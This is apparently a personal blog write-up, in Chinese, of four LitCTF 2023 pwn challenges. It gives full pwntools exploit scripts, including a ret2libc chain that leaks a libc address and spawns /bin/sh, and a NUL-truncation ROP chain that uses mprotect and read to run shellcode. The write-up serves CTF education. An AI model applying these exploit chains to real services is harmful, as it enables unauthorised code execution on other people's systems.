LitCTF-pwn学习


[LitCTF 2023]只需要nc一下~

题目描述:

现成的shell nc一下就好了~

nc连接

cat flag试试

ls试一下

查看dockerfile文件

得到假flag

看到这条命令

echo $FLAG > /flag.txt

将环境变量 $FLAG 的值输出到 /flag.txt 文件中,说明真正的 flag 来自环境变量 $FLAG,而容器运行时这个环境变量仍然可以直接读取

直接输入

echo $FLAG

也可以直接列出全部环境变量

env

最后flag为

NSSCTF{9d796fff-8e4c-4927-9b38-1356697b23d6}

[LitCTF 2023]口算题卡

题目描述:

来点小学生喜欢的x 不会算错吧?

nc连接

口算题

做完100道加减法题目后就可以得到Flag

直接使用pwntools库进行交互

exp:

import ast

from pwn import *

# Connection settings for the challenge service (host/port as given in the writeup).
TARGET_HOST = 'node4.anna.nssctf.cn'
TARGET_PORT = 28277

io = remote(TARGET_HOST, TARGET_PORT)
# 'info' keeps the run readable; 'debug' would dump every byte exchanged.
context(arch='amd64', os='linux', log_level='info')

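def _eval_arith_node(node):
    """Evaluate an AST node built only from int literals and unary/binary +/-.

    Any other node type (names, calls, attribute access, other operators)
    raises ValueError, so the evaluator cannot be steered into running code.
    """
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
        operand = _eval_arith_node(node.operand)
        return operand if isinstance(node.op, ast.UAdd) else -operand
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub)):
        left = _eval_arith_node(node.left)
        right = _eval_arith_node(node.right)
        return left + right if isinstance(node.op, ast.Add) else left - right
    raise ValueError(f"unsupported expression element: {type(node).__name__}")


def safe_eval(expression):
    """Compute the result of an addition/subtraction question without eval().

    The previous version still called eval() on the filtered text; even with a
    character allow-list, eval remains a general code evaluator, so any gap in
    the filter would execute text received from the network. Parsing into an
    AST and walking only int literals and +/- nodes removes that path.

    Args:
        expression: the question text received from the server, e.g.
            ``"12 + 30"``; characters other than ASCII digits, ``+``, ``-``,
            parentheses and spaces are discarded before parsing.

    Returns:
        The integer result, or ``None`` when the cleaned text is not a
        well-formed +/- expression (the failure is reported via ``log.error``).
    """
    # ASCII digits only: non-ASCII digits pass str.isdigit() but are not valid
    # Python numeric literals and would only fail later in the parser.
    clean_expr = ''.join(c for c in expression if c in '0123456789+- ()')
    try:
        # mode='eval' yields exactly one expression; the walker rejects every
        # node except int literals and +/-, so no builtin or call is reachable.
        tree = ast.parse(clean_expr.strip(), mode='eval')
        return _eval_arith_node(tree.body)
    except Exception as e:  # SyntaxError / ValueError / RecursionError on hostile input
        log.error(f"表达式计算错误: {expression}")
        log.error(f"错误详情: {e}")
        return None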

# Progress counters: questions received and answers actually computed.
count = 0
success = 0


def _answer_one_question():
    """Read the next question from the server and reply to it.

    Returns True when a computed answer was sent, False when the question
    could not be parsed and a placeholder ``0`` was sent instead.
    Raises EOFError (from the tube) once the server closes the connection.
    """
    global count
    io.recvuntil(b'What is ')
    # The line looks like "12 + 30?\n": drop the newline and the trailing '?'.
    problem = io.recvline().strip(b'\n?').decode()
    count += 1
    log.info(f"题目 {count}: {problem}")

    answer = safe_eval(problem)
    if answer is None:
        log.warning("无法计算答案,跳过")
        io.sendline(b'0')  # keep the request/response cadence intact
        return False

    io.sendline(str(answer).encode())
    return True


try:
    while True:
        try:
            if not _answer_one_question():
                continue
            success += 1
            log.success(f"已解答 {success}/{count}")
            # The service hands out the flag after 100 answered questions.
            if success >= 100:
                log.info("已完成100次计算,尝试获取flag")
                break
        except EOFError:
            log.warning("连接意外关闭")
            break
        except Exception as e:
            log.error(f"处理题目时发生错误: {e}")
            continue

    # Whatever the server sends after the last answer should contain the flag.
    flag = io.recvall(timeout=2).decode()
    if "flag" in flag.lower():
        log.success(f"获取到FLAG: {flag}")
    else:
        log.info("未找到flag,尝试交互式模式")
        io.interactive()

except KeyboardInterrupt:
    log.info("用户中断,退出程序")
finally:
    io.close()
    log.info(f"已关闭连接。成功解答: {success}/{count}")

运行得到

最后flag为

NSSCTF{b1f7ddfd-0533-4272-af5b-b7f21c018c93}

[LitCTF 2023]狠狠的溢出涅~

ret2libc题目

exp:

from pwn import *

local = False
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./pwn4')
libc = ELF('./libc-2.31.so')

# Fixed addresses quoted in the writeup (the 0x400... range suggests a
# non-PIE build, so they do not move between runs).
ret = 0x400556
rdi = 0x4007d3
main = 0x4006B0
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

# Leading NUL byte followed by filler up to the saved return address.
padding = b'\x00' + b'a' * (0x60 + 7)


def _open_target():
    """Return a tube to the target: a local process under gdb, or the remote service."""
    if local:
        tube = process('./pwn4')
        pwnlib.gdb.attach(tube, 'b main')
        return tube
    return remote("node4.anna.nssctf.cn", 28908)


p = _open_target()
p.recvuntil("message:")

# Stage 1: have puts() print its own GOT entry, then return to main for a second round.
leak_chain = flat([rdi, puts_got, puts_plt, main])
p.sendline(padding + leak_chain)
p.recvuntil("Received\n")
addr = u64(p.recvuntil('\x7f').ljust(8, b'\x00'))
log.success("puts real addr: " + hex(addr))

# Rebase the libc symbols on the leaked puts address.
base = addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh'))

# Stage 2: system("/bin/sh") via the same overflow.
shell_chain = flat([ret, rdi, binsh, system])
p.sendlineafter("message:", padding + shell_chain)
p.interactive()

运行得到

最后flag为

NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

[LitCTF 2023]ezlogin

\x00截断

exp:

#!/bin/env python3
from pwn import *
context(arch='amd64',terminal=['tmux','splitw','-h'])


#io = process('./pwn4')
# Connection to the challenge service (host/port as given in the writeup).
io = remote('node5.anna.nssctf.cn',21350)
#gdb.attach(io,'b *0x40061A ')
# Filler up to the overwritten return address (0x108 bytes, as given in the writeup).
pattern = b'a'*0x108
# Gadget / function addresses hard-coded from the target binary (values as
# given in the writeup). mprotect/read sitting at fixed 0x44xxxx addresses
# suggests a statically linked, non-PIE build -- not verifiable from here.
rax = 0x00000000004005af
syscall = 0x4884F5
rdi = 0x0000000000400706
rsi = 0x0000000000410043
rdx = 0x0000000000448c95
sh = 0x4A49C0+0xc          # not referenced by the chains below
buf = 0x006b6010           # writable scratch address used as the mprotect/read target below
lret = 0x0000000000475b22
rbp = 0x0000000000400b18
crbx = 0x00000000004009ad  # not referenced by the chains below
jrax = 0x0000000000400b11
mprotect = 0x449A80
reads = 0x448C80
def sendpayload(payloads):
    """Wait for the password prompt, then send ``payloads`` unchanged (no newline appended)."""
    prompt = b'Input your password:'
    io.recvuntil(prompt)
    io.send(payloads)

def encsend(data:bytes):
    """Deliver ``data`` through the password prompt although it contains NUL bytes.

    Every NUL is first replaced by 0xff so the full buffer can be sent once;
    the buffer is then re-sent as shrinking prefixes, each terminated by a real
    NUL, once for every position that originally held a NUL, walking from the
    end of the buffer towards the start. This is the "\\x00 截断" technique the
    writeup names; it presumably relies on the target copying the input as a
    C string -- not verifiable from this script alone.
    """
    encdata = data.replace(b'\x00',b'\xff')
    idx = len(data) - 1
    while 1:
        if encdata[idx] == 255:
            # idx - len(data) is negative, so the slice is just encdata[:idx]:
            # everything before the marker byte, followed by a terminating NUL.
            sendpayload(encdata[:idx-len(data)]+b'\x00')
        # NOTE(review): indentation was lost in the page; this check is placed
        # at loop level so the loop always terminates (position 0 is never sent).
        if idx == 1:
            return
        idx = idx - 1



# Stage 1: overflow sent through encsend() so the embedded NUL bytes survive.
payload = flat([pattern,rdi,0,rsi,buf,syscall,rbp,buf-0x8,lret])
encsend(payload)
sendpayload(b'PASSWORD\x00')
# pause() blocks for a keypress; useful to attach a debugger between stages.
pause()
# Stage 2: chain read into buf -- mprotect(buf-0x10, 0xc00, 7), then
# read(0, buf+0x100, 0x100) and jump to what was read (jrax).
payload = flat([rdi,buf-0x10,rsi,0xc00,rdx,7,mprotect,rdi,0,rsi,buf+0x100,rdx,0x100,rax,0,reads,rax,buf+0x100,jrax])
io.send(payload)
pause()
# Stage 3: the bytes consumed by that read().
io.send(asm(shellcraft.sh()))
io.interactive()

运行得到

最后flag为

NSSCTF{dsadsdgwr34142dcsar3211}

文章作者: yiqing
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yiqing !